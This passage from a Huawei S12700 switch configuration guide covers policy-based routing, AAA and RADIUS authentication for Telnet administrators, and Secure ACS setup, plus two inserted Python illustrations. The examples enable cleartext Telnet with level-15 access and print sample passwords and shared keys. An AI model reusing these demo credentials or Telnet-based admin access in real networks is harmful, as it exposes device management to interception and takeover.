Advanced ACL 3000, 2 rule
Acl's step is 5
rule 5 permit ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
(match-counter 0)
rule 10 permit ip source 192.168.2.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
(match-counter 0)
<Switch> display acl 3001
Advanced ACL 3001, 1 rule
Acl's step is 5
rule 5 permit ip source 192.168.1.0 0.0.0.255 (match-counter 0)
<Switch> display acl 3002
Advanced ACL 3002, 1 rule
Acl's step is 5
rule 5 permit ip source 192.168.2.0 0.0.0.255 (match-counter 0)

# Check the traffic classifier configuration.


<Switch> display traffic classifier user-defined
User Defined Classifier Information:
Classifier: c2
Precedence: 15
Operator: OR
Rule(s) : if-match acl 3002

Classifier: c0
Precedence: 5
Operator: OR
Rule(s) : if-match acl 3000

Classifier: c1
Precedence: 10
Operator: OR
Rule(s) : if-match acl 3001

Total classifier number is 3

# Check the traffic policy configuration.


<Switch> display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c0
Operator: OR
Behavior: b0
Permit
Classifier: c1
Operator: OR
Behavior: b1
Permit


Redirect: no forced
Redirect ip-nexthop
10.1.20.1
Classifier: c2
Operator: OR
Behavior: b2
Permit
Redirect: no forced
Redirect ip-nexthop
10.1.30.1

----End
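A model of the decision that traffic policy p1 makes, added here as an illustration (it is not Huawei code and not part of this document): it matches ACLs 3000 to 3002 with wildcard masks, evaluates the classifier/behavior pairs in configuration order, and applies the ARP-resolution fallback and active/standby selection described in the Configuration Notes. The simplified routing lookup, the external address 203.0.113.5 and the variant without classifier c0 are constructed for the demo; the last two scenarios go beyond the page to show why ACL 3000 must come first and what happens when the low-speed gateway cannot be resolved.

```python
"""Model of the PBR decision configured on the Switch in this example.

Added illustration, not Huawei code: advanced-ACL wildcard matching, the
classifier/behavior pairs of traffic policy p1 evaluated in configuration
order (match-order config), active/standby selection when a behavior lists
several next hops, and the fall-back to normal routing when a next hop has
no ARP entry (see Configuration Notes)."""
import ipaddress
from dataclasses import dataclass, field

ANY = ("0.0.0.0", "255.255.255.255")  # ACL wildcard pair meaning "any"


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """ACL wildcard semantics: 0 bits must match, 1 bits are don't-care."""
    care = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    return (int(ipaddress.IPv4Address(addr)) & care) == (int(ipaddress.IPv4Address(base)) & care)


@dataclass
class Rule:
    """One 'rule permit ip source ... destination ...' line."""
    source: tuple = ANY
    destination: tuple = ANY

    def matches(self, src: str, dst: str) -> bool:
        return (wildcard_match(src, *self.source)
                and wildcard_match(dst, *self.destination))


@dataclass
class Behavior:
    """'permit' alone (empty list) or 'redirect ip-nexthop' with next hops
    in the order they were configured (first = active link)."""
    nexthops: list = field(default_factory=list)


@dataclass
class Policy:
    """(ACL rules, behavior) pairs in the order 'classifier ... behavior ...' was entered."""
    entries: list

    def forward(self, src: str, dst: str, arp: set) -> str:
        """Where the packet goes: a redirect next hop or the routing-table result."""
        for rules, behavior in self.entries:
            if not any(r.matches(src, dst) for r in rules):
                continue
            # First configured next hop with an ARP entry is the active link;
            # if none resolves, the packet follows its normal route.
            for nh in behavior.nexthops:
                if nh in arp:
                    return nh
            return route(dst)
        return route(dst)


def route(dst: str) -> str:
    """Simplified routing table of the Switch: two connected VLANIFs plus the
    default route (both defaults are equal-cost; the first is used here)."""
    ip = ipaddress.IPv4Address(dst)
    if ip in ipaddress.IPv4Network("192.168.1.0/24"):
        return "connected:Vlanif10"
    if ip in ipaddress.IPv4Network("192.168.2.0/24"):
        return "connected:Vlanif20"
    return "10.1.20.1"


# ACLs 3000, 3001 and 3002 as in the Switch configuration file.
ACL_3000 = [Rule(("192.168.1.0", "0.0.0.255"), ("192.168.2.0", "0.0.0.255")),
            Rule(("192.168.2.0", "0.0.0.255"), ("192.168.1.0", "0.0.0.255"))]
ACL_3001 = [Rule(("192.168.1.0", "0.0.0.255"))]
ACL_3002 = [Rule(("192.168.2.0", "0.0.0.255"))]

P1 = Policy([(ACL_3000, Behavior()),                # c0 -> b0: permit, no redirect
             (ACL_3001, Behavior(["10.1.20.1"])),   # c1 -> b1: high-speed link
             (ACL_3002, Behavior(["10.1.30.1"]))])  # c2 -> b2: low-speed link
P1_WITHOUT_C0 = Policy(P1.entries[1:])              # the omission the notes warn about

BOTH_GATEWAYS_UP = {"10.1.20.1", "10.1.30.1"}
EXTERNAL = "203.0.113.5"  # constructed external address (TEST-NET-3)


def demo() -> dict:
    """Constructed flows through the policy, keyed by scenario."""
    return {
        "server_to_internet": P1.forward("192.168.1.10", EXTERNAL, BOTH_GATEWAYS_UP),
        "user_to_internet": P1.forward("192.168.2.10", EXTERNAL, BOTH_GATEWAYS_UP),
        "intranet_with_c0": P1.forward("192.168.1.10", "192.168.2.20", BOTH_GATEWAYS_UP),
        "intranet_without_c0": P1_WITHOUT_C0.forward("192.168.1.10", "192.168.2.20", BOTH_GATEWAYS_UP),
        # 10.1.30.1 has no ARP entry: Internet users silently take the default route
        "user_low_speed_gw_down": P1.forward("192.168.2.10", EXTERNAL, {"10.1.20.1"}),
    }


if __name__ == "__main__":
    for scenario, result in demo().items():
        print(f"{scenario:24s} -> {result}")
```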

Configuration Files
l SwitchA configuration file
#
sysname SwitchA
#
vlan batch 10 20
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 10 20
#
return

l Switch configuration file


#
sysname Switch
#
vlan batch 10 20 100 200
#
acl number 3000
rule 5 permit ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0
0.0.0.255
rule 10 permit ip source 192.168.2.0 0.0.0.255 destination 192.168.1.0
0.0.0.255
acl number 3001
rule 5 permit ip source 192.168.1.0 0.0.0.255
acl number 3002
rule 5 permit ip source 192.168.2.0 0.0.0.255
#
traffic classifier c0 operator or precedence 5
if-match acl 3000
traffic classifier c1 operator or precedence 10
if-match acl 3001
traffic classifier c2 operator or precedence 15
if-match acl 3002
#
traffic behavior b0
permit
traffic behavior b1
permit
redirect ip-nexthop 10.1.20.1
traffic behavior b2
permit
redirect ip-nexthop 10.1.30.1
#
traffic policy p1 match-order config


classifier c0 behavior b0
classifier c1 behavior b1
classifier c2 behavior b2
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif100
ip address 10.1.20.2 255.255.255.0
#
interface Vlanif200
ip address 10.1.30.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 100
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 200
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 10 20
traffic-policy p1 inbound
#
return

Relevant Information
Video
How to Configure Redirection for Policy Routing


10 Typical User Access and Authentication Configuration

About This Chapter

10.1 Typical AAA Configuration


10.2 Typical NAC Configuration (Common Mode)
10.3 Typical NAC Configuration (Unified Mode) (V200R007C00 and Earlier Versions,
V200R008C00)
10.4 Typical NAC Configuration (Unified Mode) (V200R007C20, V200R009C00 and Later
Versions)
10.5 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication
Server) (V200R007C00 and Earlier Versions, V200R008C00)
10.6 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication
Server) (V200R007C20, V200R009C00 and Later Versions)


10.1 Typical AAA Configuration

10.1.1 Notice to Be Taken When the Device Connects to Non-Huawei RADIUS Servers
Notice to Be Taken When the Device Connects to an H3C iMC RADIUS Server
When the device connects to an H3C iMC RADIUS server to perform authentication,
authorization, or accounting for 802.1x users, configure security check policies (for example,
check whether the 802.1x client has two network cards and whether the 802.1x client version
is correct) on the RADIUS server to improve security. In addition, perform the following
operations on the device:
1. Configure RADIUS accounting.
2. Run the dot1x authentication-method eap command to configure EAP relay
authentication for 802.1x users.
3. Run the dot1x eap-notify-packet eap-code 10 data-type 25 command to configure the
device to return the EAP packets with type value of 10 and data type of 25 to the
RADIUS server.
4. Run the radius-attribute translate HW-Up-Priority HW-User-Information receive
command to convert the HW-Up-Priority attribute in the received RADIUS packets into
HW-User-Information.
5. If the RADIUS server needs to dynamically authorize AAA users, the attributes
delivered by security check policy may be different from the attributes delivered by
dynamic authorization. Therefore, run the authorization-modify mode modify
command to set the update mode for user authorization information delivered by the
RADIUS server to Modify. After the command is executed, the attributes delivered by
dynamic authorization will not overwrite the attributes delivered by security check
policy.

Notice to Be Taken When the Device Connects to a Ruijie RADIUS Server


If you want to view the MAC addresses or IP addresses of online users on a Ruijie RADIUS
server, set the device type to H3C or Digital China on the RADIUS server.

Notice to Be Taken When the Device Connects to a Leagsoft RADIUS Server


When the NAS-IP of the RADIUS client (device) is configured on the Leagsoft RADIUS
server, the MAC address of the device also needs to be configured.

Notice to Be Taken When the Device Connects to a Symantec RADIUS Server


l The Symantec RADIUS server can only be used as an authentication server, but cannot
be used as an authorization or accounting server. When the device connects to a
Symantec RADIUS server, ensure that the RADIUS server is not configured as an
authorization or accounting server.
l When the Symantec RADIUS server performs 802.1x authentication for users, perform
the following configurations on the device:


– Run the undo dot1x handshake command to disable handshake between the
device and 802.1x online users.
– Run the dot1x authentication-method eap command to configure EAP relay
authentication for 802.1x users.

10.1.2 Example for Configuring Authentication for Telnet Login Users (AAA Local Authentication)

AAA Local Authentication Overview


Users are locally authenticated through AAA. To log in to a device, a user must enter the
correct user name and password. User information is configured on the local device. There is
no need to deploy an authentication server on the network. Therefore, AAA local
authentication is fast and inexpensive. However, how much user information can be stored
depends on the hardware capacity of the device.

Configuration Notes
l This example applies to all S12700 versions.
NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 10-1, the administrator needs to remotely manage the device in a simplified
and secure manner. The specific requirements are as follows:

1. The administrator must enter the correct user name and password to log in to the device
through Telnet.
2. After logging in to the device through Telnet, the administrator can run the commands at
levels 0-15.

Figure 10-1 Configuring authentication for Telnet login users (AAA local authentication)

[Figure not reproduced. The Admin (user name user1, password Huawei@1234) reaches the Switch through the management network on GE1/0/1, VLANIF10, 10.1.2.10/24.]

Configuration Roadmap
1. Enable the Telnet service.
2. Set the authentication method for Telnet login users to AAA.
3. Configure AAA local authentication, including creating a local user, setting the user
access type to Telnet, and setting the user level to 15.


Procedure
Step 1 Configure interfaces and assign IP addresses.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.2.10 24
[Switch-Vlanif10] quit
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

Step 2 Enable the Telnet server.


[Switch] telnet server enable

Step 3 Set the authentication method for the VTY user interface to AAA.
[Switch] user-interface maximum-vty 15 //Set the maximum number of VTY login
users to 15 (the value range varies according to product versions and models). By
default, the maximum number of Telnet users is 5.
[Switch] user-interface vty 0 14 //Enter the VTY 0-14 user view.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication method for
the VTY user view to AAA.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user interface
to support Telnet. By default, switches in V200R006 and earlier versions support
Telnet, and switches in V200R007 and later versions support SSH.
[Switch-ui-vty0-14] quit

Step 4 Configure AAA local authentication.


[Switch] aaa
[Switch-aaa] local-user user1 password irreversible-cipher Huawei@1234 //Create
local user user1 and set the password. The password is displayed in cipher text
in the configuration file, so remember the password. If you forget the password,
run this command again to reconfigure the password.
[Switch-aaa] local-user user1 service-type telnet //Set the access type of user1
to Telnet. The user can log in through only Telnet (by default, users can log in
through any method in versions earlier than V200R007 and cannot log in through
any method in V200R007 and later versions).
[Switch-aaa] local-user user1 privilege level 15 //Set the user level of user1
to 15. The user can use the commands of level 15 and lower levels.
[Switch-aaa] quit

NOTE

When the entered user name does not contain a domain name, the device authenticates the user using the
default administrative domain default_admin. By default, the default administrative domain uses the
authentication scheme default and accounting scheme default.
l Authentication scheme default: local authentication
l Accounting scheme default: non-accounting

Step 5 Verify the configuration.


Choose Start > Run on your computer and enter cmd to open the cmd window. Run the
telnet command and enter the user name user1 and password Huawei@1234 to log in to the
device through Telnet.
C:\Documents and Settings\Administrator> telnet 10.1.2.10
Username:user1
Password:***********
<Switch>//The administrator successfully logs in.

----End


Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10
#
telnet server enable
#
aaa
local-user user1 password irreversible-cipher %^%#.)P`(ahmeXKljES$}IC%OdjjC$m)cA#}T(8z4*ZK!_Z+GSo<7C*O8WO,!rt;%^%#
local-user user1 privilege level 15
local-user user1 service-type telnet
#
interface Vlanif10
ip address 10.1.2.10 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
user-interface maximum-vty 15
user-interface vty 0 14
authentication-mode aaa
protocol inbound telnet
#
return

10.1.3 Example for Configuring Authentication for Telnet Login Users (RADIUS Authentication)

RADIUS Authentication Overview


When a RADIUS authentication server is deployed on a network, users can be authenticated
through RADIUS. User information is created and maintained by the RADIUS authentication
server. A user can successfully log in to the device only when the entered user name and
password are the same as those configured on the RADIUS server. Generally, RADIUS
authentication is configured on the network requiring high security, for example, financial,
government, and telecommunication carrier networks.

Configuration Notes
l This example applies to all S12700 versions.
NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 10-2, a RADIUS server is deployed on a network. The administrator is
authenticated through RADIUS and Telnet to the device to remotely manage it. The specific
requirements are as follows:
1. The administrator must enter the correct user name and password to log in to the device
through Telnet.
2. After logging in to the device through Telnet, the administrator can run the commands at
levels 0-15.


Figure 10-2 Configuring authentication for Telnet login users (RADIUS authentication)

[Figure not reproduced. The Admin (user name user1, password Huawei@1234) reaches the Switch through the management network on GE1/0/1, VLANIF10, 10.1.2.10/24; the Switch connects to the RADIUS server (10.1.6.6/24) through GE1/0/2, VLANIF20, 10.1.6.10/24.]

Configuration Roadmap
1. Enable the Telnet service.
2. Set the authentication method for Telnet login users to AAA.
3. Configure RADIUS authentication, including creating a RADIUS server template, an
AAA authentication scheme, and a service scheme, and applying the schemes to a
domain.
4. Configure the domain to which the administrator belongs as the default administrative
domain so that the administrator does not need to enter the domain name when logging
in.
NOTE

This example only provides the configurations on the device. Ensure that the required parameters have been
set on the RADIUS server, for example, the device's IP address, the shared key, and the user account.

Procedure
Step 1 Configure interfaces and assign IP addresses.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.2.10 24
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.1.6.10 24
[Switch-Vlanif20] quit
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Enable the Telnet server.


[Switch] telnet server enable

Step 3 Set the authentication method for the VTY user interface to AAA.
[Switch] user-interface maximum-vty 15 //Set the maximum number of VTY login
users to 15 (the value range varies according to product versions and models). By
default, the maximum number of Telnet users is 5.


[Switch] user-interface vty 0 14 //Enter the VTY 0-14 user view.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication method for
the VTY user view to AAA.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user interface
to support Telnet. By default, switches in V200R006 and earlier versions support
Telnet, and switches in V200R007 and later versions support SSH.
[Switch-ui-vty0-14] quit

Step 4 Configure RADIUS authentication.

# Configure the RADIUS server template to implement communication between the device
and the RADIUS server.
[Switch] radius-server template 1
[Switch-radius-1] radius-server authentication 10.1.6.6 1812 //Specify the IP
address and port number of the RADIUS authentication server.
[Switch-radius-1] radius-server shared-key cipher Hello@1234 //Specify the
shared key of the RADIUS server, which must be the same as that configured on the
RADIUS server.
[Switch-radius-1] quit

NOTE

If the RADIUS server does not accept the user names containing domain names, run the undo radius-server
user-name domain-included command on the device so that the packets sent from the device to the
RADIUS server do not contain domain names.

# Configure an AAA authentication scheme and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1
[Switch-aaa-authen-sch1] authentication-mode radius
[Switch-aaa-authen-sch1] quit

# Configure a service scheme and set the user level to 15.


[Switch-aaa] service-scheme sch1
[Switch-aaa-service-sch1] admin-user privilege level 15
[Switch-aaa-service-sch1] quit

# Apply the AAA authentication scheme, RADIUS server template, and service scheme to the
domain.
[Switch-aaa] domain huawei.com
[Switch-aaa-domain-huawei.com] authentication-scheme sch1
[Switch-aaa-domain-huawei.com] radius-server 1
[Switch-aaa-domain-huawei.com] service-scheme sch1
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

Step 5 Configure the domain to which the administrator belongs as the default administrative domain
so that the administrator does not need to enter the domain name when logging in to the
device through Telnet.
[Switch] domain huawei.com admin

Step 6 Verify the configuration.

# Run the test-aaa command on the device to test whether the administrator can pass the
authentication.
[Switch] test-aaa user1 Huawei@1234 radius-template 1

# Choose Start > Run on your computer running Windows operating system and enter cmd
to open the cmd window. Run the telnet command and enter the user name user1 and
password Huawei@1234 to log in to the device through Telnet.


C:\Documents and Settings\Administrator> telnet 10.1.2.10
Username:user1
Password:***********
<Switch>//The administrator successfully logs in.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
domain huawei.com admin
#
telnet server enable
#
radius-server template 1
radius-server shared-key cipher %^%#Zh-H!i<+2RUI,E4_q<''+[14Fmj4@>Aa0pM0H}@D%^%#
radius-server authentication 10.1.6.6 1812 weight 80
#
aaa
authentication-scheme sch1
authentication-mode radius
service-scheme sch1
admin-user privilege level 15
domain huawei.com
authentication-scheme sch1
service-scheme sch1
radius-server 1
#
interface Vlanif10
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.6.10 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
user-interface maximum-vty 15
user-interface vty 0 14
authentication-mode aaa
protocol inbound telnet
#
return
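A review check over the configuration files of 10.1.2 and 10.1.3, added here as an example (it is not Huawei tooling and not part of this document): it parses the VRP configuration text, confirms that every VTY user interface authenticates through AAA, flags the cleartext Telnet transport and level-15 local users, and verifies that a RADIUS authentication scheme is actually reachable through the default administrative domain set with domain ... admin. The cipher blobs are replaced by placeholders, and the two weak variants (authentication-mode none, and an admin domain with no radius-server binding) are constructed to show findings.

```python
"""Audit of the VTY login settings in a VRP configuration file (added
example, not Huawei tooling). It reads text in the form shown under
"Configuration Files" in 10.1.2 and 10.1.3 and reports what a reviewer
checks before exposing the management plane."""
import re

# 10.1.2 (local authentication) file; the cipher blob is replaced by a placeholder.
LOCAL_AUTH_CONFIG = """\
#
telnet server enable
#
aaa
 local-user user1 password irreversible-cipher %^%#<cipher omitted>%^%#
 local-user user1 privilege level 15
 local-user user1 service-type telnet
#
user-interface maximum-vty 15
user-interface vty 0 14
 authentication-mode aaa
 protocol inbound telnet
#
return
"""

# Relevant sections of the 10.1.3 (RADIUS) file, same placeholder.
RADIUS_CONFIG = """\
#
domain huawei.com admin
#
radius-server template 1
 radius-server shared-key cipher %^%#<cipher omitted>%^%#
 radius-server authentication 10.1.6.6 1812 weight 80
#
aaa
 authentication-scheme sch1
  authentication-mode radius
 domain huawei.com
  authentication-scheme sch1
  radius-server 1
#
user-interface vty 0 14
 authentication-mode aaa
 protocol inbound telnet
#
return
"""

# Constructed weak variants: a VTY left without AAA, and an admin domain
# that is declared but never bound to the RADIUS template.
NO_AAA_CONFIG = LOCAL_AUTH_CONFIG.replace("authentication-mode aaa", "authentication-mode none")
UNBOUND_DOMAIN_CONFIG = RADIUS_CONFIG.replace("  radius-server 1\n", "")


def config_lines(config: str) -> list:
    """Stripped non-empty lines; '#' is kept because it ends a section."""
    return [l.strip() for l in config.splitlines() if l.strip() and l.strip() != "return"]


def vty_blocks(config: str) -> dict:
    """Map each 'user-interface vty a b' line to the settings beneath it."""
    blocks, current = {}, None
    for line in config_lines(config):
        if line.startswith("user-interface vty"):
            current = line
            blocks[current] = []
        elif line == "#" or line.startswith("user-interface"):
            current = None  # section end, maximum-vty, console, ...
        elif current is not None:
            blocks[current].append(line)
    return blocks


def radius_bound_to_admin_domain(config: str) -> bool:
    """True when 'domain X admin' names an AAA domain that references a RADIUS template."""
    m = re.search(r"^\s*domain (\S+) admin\s*$", config, re.M)
    if not m:
        return False
    in_domain = False
    for line in config_lines(config):
        if line == "#":
            in_domain = False
        elif line.startswith("domain "):
            in_domain = line == f"domain {m.group(1)}"
        elif in_domain and line.startswith("radius-server "):
            return True
    return False


def audit(config: str) -> list:
    """Review findings for one configuration; an empty list means nothing flagged."""
    findings = []
    for name, lines in vty_blocks(config).items():
        modes = [l.split()[-1] for l in lines if l.startswith("authentication-mode")]
        if modes != ["aaa"]:
            findings.append(f"{name}: authentication-mode {modes or 'unset'}, expected aaa")
        if "protocol inbound telnet" in lines:
            findings.append(f"{name}: Telnet accepted; credentials cross the network in cleartext")
    for m in re.finditer(r"local-user (\S+) privilege level 15\b", config):
        findings.append(f"local user {m.group(1)} holds privilege level 15")
    if "authentication-mode radius" in config and not radius_bound_to_admin_domain(config):
        findings.append("RADIUS scheme configured but the admin domain is not bound to a radius-server template")
    return findings
```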

Related Content
AAA Attribute Query Tool

This tool shows details about AAA attributes on switches. You do not need to register a
Huawei account before using this tool.


10.1.4 Example for Configuring Authentication for Telnet Login Users (Using the Secure ACS as a RADIUS Authentication Server)

RADIUS Authentication Overview


When a RADIUS authentication server is deployed on a network, users can be authenticated
through RADIUS. User information is created and maintained by the RADIUS authentication
server. A user can successfully log in to the device only when the entered user name and
password are the same as those configured on the RADIUS server. Generally, RADIUS
authentication is configured on the network requiring high security, for example, financial,
government, and telecommunication carrier networks.

Configuration Notes
l This example applies to all S12700 versions.
NOTE
To know details about software mappings, see Switch Software Mapping Search.
l In this example, the RADIUS authentication server is the secure ACS running version
5.2.0.26.

Networking Requirements
As shown in Figure 10-3, on an enterprise network, an administrator connects to the switch
through a management network and an 802.1x user connects to the switch through an access
network. The enterprise uses ACS to create and maintain user information. The administrator
can log in to the ACS through web.
The administrator and 802.1x user are allocated different accounts and rights to improve
security. The requirements are as follows:
1. The administrator can Telnet to the switch only after entering the user name and
password, and can use the commands from level 0 to level 15 after login.
2. To access the switch, the 802.1x user needs to start the 802.1x client, enter the user name
and password, and be authenticated.
After the 802.1x user accesses the switch:
– The user can use the commands at level 0 to level 2.
– The ACS delivers VLAN 100 and ACL 3000 to the user.
3. The administrator is authenticated in the default domain, and the 802.1x user is
authenticated in the huawei.com domain.


Figure 10-3 Networking of Telnet login user authentication (Using the Secure ACS as a RADIUS Authentication Server)

[Figure not reproduced. The Admin on the management network reaches the Switch through GE1/0/1 (10.1.2.10/24); the Secure ACS (10.1.6.6/24) connects through GE1/0/2 (10.1.6.10/24); the 802.1x user on the access network connects through GE1/0/3, VLANIF10, 10.1.3.10/24. VLANIF20 and VLANIF30 are the Switch interfaces on the management and ACS links.]

Preparations

Table 10-1 Data used to connect the switch to ACS

Item | Data
Administrator's user name and password of the ACS client | User name: acsadmin; Password: Admin_123
Administrator's user name and password of the switch | User name: admin1; Password: Admin@1234
User name and password of the 802.1x user | User name: user1@huawei.com; Password: Huawei@1234
Switch name and the IP address of the interface connected to the ACS | Switch name: Switch; IP address: 10.1.6.10
Shared password of switch and ACS | Hello@1234

Configuration Roadmap
1. Configure the switch.
a. Configure interfaces and allocate IP addresses to them, so that the switch can
communicate with the ACS.
b. Create a VLAN and an ACL that the ACS will deliver.
c. Enable the Telnet service.
d. Configure AAA authentication for the administrator to Telnet to the switch.
e. Configure RADIUS authentication, including creating the RADIUS server template
and AAA authentication scheme and applying them to the default_admin and
huawei.com domains.

Issue 10 (2016-10-30) Huawei Proprietary and Confidential 570


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples 10 Typical User Access and Authentication Configuration

f. Enable 802.1x authentication on the interface that the 802.1x user accesses.
2. Configure the ACS, add access devices and users, and configure an authentication and
authorization profile. Add access policies and bind users to the authentication and
authorization profile.
NOTE

Ensure that the switch (Switch) and the ACS can communicate with each other.

Procedure
Step 1 Configure the switch.
1. Configure interfaces and allocate IP addresses to them, so that the switch can
communicate with the ACS.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.6.10 24 //Configure the IP address used
to communicate with the ACS.
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.1.2.10 24
[Switch-Vlanif20] quit
[Switch] interface vlanif 30
[Switch-Vlanif30] ip address 10.1.3.10 24
[Switch-Vlanif30] quit
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet1/0/2 //Configure the interface used to
connect to administrators.
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet1/0/3 //Configure the interface used to
connect to 802.1x users.
[Switch-GigabitEthernet1/0/3] port link-type hybrid //If the AAA server
needs to deliver VLAN or ACL to access users, the user access interface (with
authentication enabled) on the switch must be a hybrid interface.
[Switch-GigabitEthernet1/0/3] port hybrid untagged vlan 30
[Switch-GigabitEthernet1/0/3] quit

2. Create a VLAN and an ACL that the ACS will deliver to access users.
The ACS can deliver a VLAN or ACL only if it has been created on the switch with the
same ID as that configured on the AAA server.
[Switch] vlan 100
[Switch-vlan100] quit
[Switch] acl 3000
[Switch-acl-adv-3000] quit

3. Enable the Telnet server.


[Switch] telnet server enable

4. Set the authentication mode for VTY users to AAA.


[Switch] user-interface maximum-vty 15 //Set the maximum number of VTY
users to 15 (this value varies with versions and models). By default, a
maximum of five Telnet users are supported.
[Switch] user-interface vty 0 14 //Enter the VTY 0-14 user interface view.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication mode
for VTY users to AAA.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user
interface to support Telnet. By default, switches in V200R006 and earlier
versions support Telnet, and switches in V200R007 and later versions support
SSH.
[Switch-ui-vty0-14] quit

5. Configure RADIUS authentication for access users on the switch.

# Configure a RADIUS server template so that the switch and ACS can communicate
through RADIUS.
[Switch] radius-server template 1
[Switch-radius-1] radius-server authentication 10.1.6.6 1812 //Specify the
IP address and port number of the ACS.
[Switch-radius-1] radius-server shared-key cipher Hello@1234 //Set the ACS
shared key, which must be the same as that configured on the ACS.
[Switch-radius-1] quit

NOTE

If the user name stored on the AAA server does not contain a domain name, run the undo radius-server user-name domain-included command. After this command is executed, the user names in the packets sent from the switch to the RADIUS server do not contain domain names.

# Create an AAA authentication scheme and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1
[Switch-aaa-authen-sch1] authentication-mode radius
[Switch-aaa-authen-sch1] quit

# Apply the AAA authentication scheme and RADIUS server template to the default
administrative domain.

NOTE

Administrators (users accessing the switch through Telnet, SSH, FTP, HTTP, or terminal) are
authenticated in the default administrative domain.
By default, the administrative domain is default_admin.
[Switch-aaa] domain default_admin
[Switch-aaa-domain-default_admin] radius-server 1
[Switch-aaa-domain-default_admin] authentication-scheme sch1
[Switch-aaa-domain-default_admin] quit

# Apply the AAA authentication scheme and RADIUS server template to the
huawei.com domain.
[Switch-aaa] domain huawei.com
[Switch-aaa-domain-huawei.com] radius-server 1
[Switch-aaa-domain-huawei.com] authentication-scheme sch1
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

6. Enable 802.1x authentication on an interface.

# Set the NAC mode to unified mode.


[Switch] authentication unified-mode

NOTE

After switching between the common mode and the unified mode, restart the switch for the
configuration to take effect. By default, the unified mode is used.

# Enable 802.1x authentication on interface GE1/0/3.


[Switch] interface gigabitethernet1/0/3
[Switch-GigabitEthernet1/0/3] authentication dot1x
[Switch-GigabitEthernet1/0/3] dot1x authentication-method eap //This step
is recommended because most 802.1x clients use EAP relay authentication.
[Switch-GigabitEthernet1/0/3] quit


Step 2 Configure the secure ACS.


1. Log in to the ACS client and enter the user name and password to open the homepage.
Enter the uniform resource locator (URL) of the ACS and press Enter to open
the ACS login page. Enter the user name and password, and click Login.

NOTE

The ACS's URL address is in the format http://IP/ or https://IP/, for example, http://10.13.1.1/ or https://10.13.1.1/.

After you log in to the ACS, the homepage is displayed.

Table 10-2 Navigation areas on the ACS client

Navigation Area | Description
My Workspace | Includes the welcome page, configuration instructions for common tasks, and account information. To change the administrator password, choose My Workspace > My Account.
Network Resources | Configures network devices, including AAA clients and network device groups.
Users and Identity Stores | Configures the internal users and identities.
Policy Elements | Configures the authentication and authorization profiles, including the matching conditions and results of access policies.
Access Policies | Configures access policies and associates users with authentication and authorization profiles.
Monitoring and Reports | Displays log information.
System Administration | Manages and maintains the ACS.

2. Add an access device.


a. Choose Network Resources > Network Devices and AAA clients > Create, as
shown in Figure 10-4.


Figure 10-4 Configuring network device and AAA client

b. Enter the switch name and IP address, set the authentication mode between the
switch and ACS to RADIUS, enter the shared secret and CoA port number, and
click Submit, as shown in Figure 10-5.

